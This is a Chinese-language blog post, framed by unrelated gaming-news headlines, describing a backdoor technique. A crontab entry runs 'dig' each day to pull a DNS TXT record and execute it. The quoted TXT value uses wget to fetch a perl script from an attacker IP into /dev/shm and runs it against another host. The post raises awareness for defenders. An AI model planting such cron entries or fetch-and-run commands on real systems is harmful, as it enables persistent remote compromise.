PLAYSTATION 5 預定於 2020年11月19日 於香港發售   Riot Games新FPS遊戲《特戰英豪VALORANT》評測   PS Plus十月份免費遊戲——《Need for Speed: Payback》和《Vampyr》   Street FighterV最後的Season V啟動!另外還有「服裝設計比賽」!   1/4比例的超細緻模型《SQUARE ENIX MASTERLINE NieR:Automata》開始接受預約!   UNIQLO×超級瑪利歐35週年紀念T-shirt來了!   成為Razer Pay馬來西亞用戶即可得到免費Razer口罩!#RazerForLife   Dragon Quest Walk新活動《2020大冒險 找尋傳說中的過年菜》 

使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式

商業

現在入侵機器後,攻擊模式越來越多元了,連要做什麼事情的程式(一般至少會寫要去哪抓程式),都不直接寫在裡面了...

使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式

平常安全性的檢查,比較不會去檢查 Cron,所以這次的攻擊手法就是把後門埋在 Cronjob 裡面,而且看起來就只是做 DNS 的查詢動作而已。

下述內容整理自此篇:Cronjob Backdoors

此攻擊手法是利用 Cronjob 埋入後門,定期依照 DNS TXT 的紀錄來遠端執行惡意程式。

手法步驟如下:

  1. crontab 埋入下述:
    0 1 * * * /bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"
  2. 於 logging.chat 這個 Domain 的 DNS TXT 內容如下:
    "wget hxxp://89(.)248(.)171(.)3/h.pl -q -O /dev/shm/h.pl&&nohup perl /dev/shm/h.pl 66.172.27.225 80&disown"

於是就會每天在 1:00 的時候,自動抓取惡意程式來執行。

Tsung
vbtrax

隨機商業新聞